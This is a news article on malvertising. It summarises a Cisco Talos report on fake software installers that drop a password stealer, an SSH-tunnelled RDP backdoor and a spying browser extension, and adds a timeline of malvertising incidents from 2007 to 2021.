Cisco Talos Intelligence Group recently observed a malware distribution campaign that tries to trick users into executing fake software installers of popular software on their systems. It said it believes with moderate confidence that online advertising is used to reach potential victims that are searching for software to install on their systems.
Cyber magazine takes a look at malvertising.
What is malvertising?
Malvertising, or malicious advertising, is the use of online, malicious advertisements to spread malware and compromise systems. Generally this occurs through the injection of unwanted or malicious code into ads. Malicious actors then pay legitimate online advertising networks to display the infected ads on various websites, exposing every user visiting these sites to the potential risk of infection. Generally, the legitimate advertising networks and websites are not aware they are serving malicious content.
Why does malvertising work?
Once the fake installers run, they execute three pieces of malware on the victim's system:
- A password stealer that collects all the credentials available on the system.
- A "backdoor" that sets up remote access via a stealth Microsoft Remote Desktop session by forwarding the RDP port through an SSH tunnel, allowing access to systems even when behind a firewall.
- A malicious browser extension that contains several information-stealing features, such as keylogging and taking screenshots.
Cisco Talos' Technical Lead of Security Research, Tiago Pereira, says: "Password stealers have long presented a risk to individuals and to companies. The compromised accounts are frequently sold in underground forums and may lead to additional compromise using the stolen accounts and through password reuse. The chrome extension adds to this risk by allowing the theft of credentials used on the web that may not be stored in the system. Additionally, the use of an SSH tunnel to forward RDP to an external server provides attackers with a reliable way to login remotely to a system, bypassing firewall control."
According to Wikipedia, here is a timeline of malvertising activity:
2007/2008: The first recorded sighting of malvertising was in late 2007 to early 2008. This threat was based on a vulnerability in Adobe Flash and affected a number of platforms including MySpace, Excite and Rhapsody.
2009: The online edition of The New York Times Magazine was found to be serving up an ad that was part of a larger click fraud scam that created a botnet network of malware-infected computers, nicknamed the Bahama botnet, that then went on to be used to carry out click fraud on pay per click ads all over the web.
2010: Malvertising takes off. Marketing analysts ClickZnoted that the Online Trust Alliance (OTA) identified billions of display ads, across 3,500 sites carrying malware. In the same year the Online Trust Alliance formed a cross industry Anti-Malvertising Task Force.
2011: Spotify had a malvertising attack.
2012: Symantec includes malvertising as a section in its Internet Security Threat Report 2013.
2013: A major malvertising campaign was waged against Yahoo.com, one of the largest ad platforms with monthly visits of 6.9 billion.
2015: McAfee's Threat Report for February 2015 said that malvertising was growing quickly on mobile platforms.
2021: Ransomware gang REvil was spotted using paid positioning in Google search results to deliver malicious files to victims.